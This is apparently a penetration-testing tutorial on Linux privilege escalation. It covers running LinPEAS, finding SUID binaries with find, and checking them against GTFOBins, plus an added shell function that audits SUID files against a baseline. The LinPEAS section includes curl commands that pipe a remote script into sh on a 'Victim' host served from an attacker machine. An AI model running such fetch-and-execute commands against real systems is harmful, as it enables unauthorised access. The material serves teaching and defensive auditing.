Linux Privilege Escalation

LinPEAS

Latest Releases: Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub

# From Github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

Privilege Escalation: SUID

Finding SUID Binaries

Use the command “find / -perm -u=s -type f 2>/dev/null” to search the file system for files with the SUID bit set. Let’s break down this command.

find – Initiates the “find” command

/ – Searches the whole file system

-perm – searches for files with specific permissions

-u=s – Matches files that have the SUID bit set (symbolic mode u=s), regardless of their other permission bits. Symbolic modes are accepted in this form

-type f – Only search for files

2>/dev/null – Suppresses errors

find / -type f -perm -04000 -ls 2>/dev/null

A good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list https://gtfobins.github.io/#+suid).

The list above shows that nano has the SUID bit set. Unfortunately, GTFOBins does not provide us with an easy win. As is typical of real-life privilege escalation scenarios, we will need to find intermediate steps that will help us leverage whatever minuscule finding we have.
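
The same search can be run as a recurring audit on hosts you administer. The following is an added example, not part of the original post: a shell function that lists SUID files under a directory and flags any that are missing from a baseline of expected SUID files or whose name is on a watch list. The function names, the two list-file formats and the demo file names are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit SUID files under a root against a baseline and a watch list.
# Usage: suid_audit ROOT BASELINE WATCHLIST
#   BASELINE  - one absolute path per line: SUID files you expect (e.g. from a clean install)
#   WATCHLIST - one binary name per line, e.g. copied by hand from the GTFOBins SUID filter
# Prints one line per finding:
#   UNEXPECTED <path>   SUID file that is not in the baseline
#   WATCHLIST  <path>   SUID file whose name is on the watch list
suid_audit() {
    root=$1 baseline=$2 watchlist=$3
    # -perm -4000 is the octal form of -perm -u=s; -xdev stays on one file system.
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        name=${path##*/}
        # grep -x: whole-line match, -F: fixed string, -q: no output
        if ! grep -qxF -- "$path" "$baseline"; then
            printf 'UNEXPECTED %s\n' "$path"
        fi
        if grep -qxF -- "$name" "$watchlist"; then
            printf 'WATCHLIST  %s\n' "$path"
        fi
    done
}

# Constructed demo: builds a throwaway tree instead of scanning /.
suid_demo() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/usr/bin"
    for f in passwd find notes; do : > "$d/usr/bin/$f"; done
    chmod 4755 "$d/usr/bin/passwd" "$d/usr/bin/find"   # SUID bit set
    chmod 0755 "$d/usr/bin/notes"                      # no SUID bit
    printf '%s\n' "$d/usr/bin/passwd" > "$d/baseline"  # expected SUID files
    printf '%s\n' find vim > "$d/watchlist"            # constructed sample names
    # Strip the temporary prefix so the report reads like real paths.
    suid_audit "$d/usr" "$d/baseline" "$d/watchlist" | sed "s|$d||"
    rm -rf "$d"
}
```

Any UNEXPECTED entry that has no reason to run with its owner's privileges can have the bit removed with chmod u-s.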

Privilege Escalation: PATH